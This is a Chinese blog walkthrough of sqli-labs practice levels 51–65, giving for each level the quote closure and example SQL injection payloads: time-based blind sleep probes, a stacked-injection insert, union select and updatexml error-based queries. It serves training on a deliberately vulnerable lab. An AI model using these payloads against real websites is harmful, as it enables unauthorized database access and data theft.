当前位置: 首页 > news >正文

sqli-labs靶场less51~less65

less51

1.我们打开靶场看一下,并且判断一下得到闭合方式为单引号闭合

2.这一关依旧使用时间盲注,首先爆一下数据库的长度

?sort=1' and if(length(database())>1,sleep(5),1)--+
?sort=1' and if(length(database())>8,sleep(5),1)--+

3.剩余步骤和前面几关相同,只有闭合方式不同

less52

1.打开靶场看一下,是数字型注入

2.这一关我们可以使用堆叠注入,在用户名的地方可以进行相关数据的查询

?sort=1;insert into users(id,username,password) values ('17',(select database()),'123456')

3.剩下的部分可以使用以上的语句进行查询,只要在用户名的地方进行select语句进行查询即可

less53

1.打开靶场看一下,判断闭合方式为单引号

2.这一关可以使用上一关的堆叠注入,也可以使用延时注入,在这里博主使用延时注入爆一下数据库的名字长度,剩余内容按照时间盲注往下做就可以了

1' and if(length(database())>1,sleep(5),1)--+
1' and if(length(database())>8,sleep(5),1)--+

less54

1.打开靶场看一下,判断闭合方式为单引号闭合

2.我们使用联和注入来爆内容,首先看回显点

?id=-1'  union select 1,2,3--+

3.接下来数据库名字

?id=-1'  union select 1,database(),3--+

4.剩余部分按照联合注入做即可

less55

这一关与上一关的差别在于闭合方式,这一关闭合方式为一个括号,其余做法与上一关相同

less56

这一关与上一关的差别在于闭合方式,这一关闭合方式为‘),其余做法与上一关相同

less57

这一关与上一关的差别在于闭合方式,这一关闭合方式为“,其余做法与上一关相同

less58

1.打开靶场看一下

2.这一关使用报错注入来进行注入

?id=1' and updatexml(1,concat(1,(select database())),1)--+

less59

这一关和上一关做法相同,都是用报错注入,只不过闭合方式为数字型

less60

这一关和上一关做法相同,都是用报错注入,只不过闭合方式为双引号加括号

less61

这一关和上一关做法相同,都是用报错注入,只不过闭合方式为单引号加两个双引号

less62

1.打开靶场看一下,这一关没有报错信息,所以我们使用时间盲注,闭合方式为单引号加括号

1')and if(length(database())>1,sleep(5),1)--+
1')and if(length(database())>8,sleep(5),1)--+

less63

这一关和上一关一样,使用报错注入,闭合方式为单引号

less64

这一关和前两关一样,使用报错注入,闭合方式为两个括号

less65

这一关和前几关一样,使用报错注入,闭合方式为一个单引号

http://www.dtcms.com/a/322618.html

相关文章:

  • Debian防火墙 ufw
  • DataDex 多样化 JSON 服务——使用教程
  • K8s-pod控制器
  • Web前端之Vue框架
  • Java Stream API 实战:提升集合处理的效率与可读性!
  • 使用 Visual Studio 2022 编译 PortAudio 项目
  • 华为实验NAT
  • spring.config.import 不存在
  • 文生图工具之ComfyUI从原理到实践的全维度剖析
  • 矩阵的条件数 向量的条件数
  • 【面试场景题】通过LinkedHashMap来实现LRU与LFU
  • 时序分解 | MATLAB实现SAO-VMD雪消融算法优化变分模态分解
  • 使用流式函数解决v语言zstd程序解压缩失败问题
  • react 常用组件库
  • 下肢康复机器人机械结构设计cad【6张】三维图+设计说明说书
  • web应用服务器tomcat
  • 算法_python_牛客华为机试笔记_01
  • 算法篇----分治(快排)
  • Amazon Linux 训练lora模型的方式
  • 【Canvas与旗帜】圆角蓝底大黄白星十一红白带旗
  • sqli-labs通关笔记-第39关 GET数值型堆叠注入(手工注入+脚本注入两种方法)
  • 【Linux】Tomcat
  • 2025年华数杯评审标准发布
  • 企业WEB服务器nginx新手超详细讲解
  • Docker 搭建 Jenkins 实现自动部署!
  • jenkins-飞书通知机制
  • STM32 外设驱动模块四:光敏电阻(LDR) 模块
  • Linux网络编程:TCP的远程多线程命令执行
  • Ollama 开启远程端口
  • 闲鱼智能监控机器人:基于 Playwright 与 AI 的多任务监控分析工具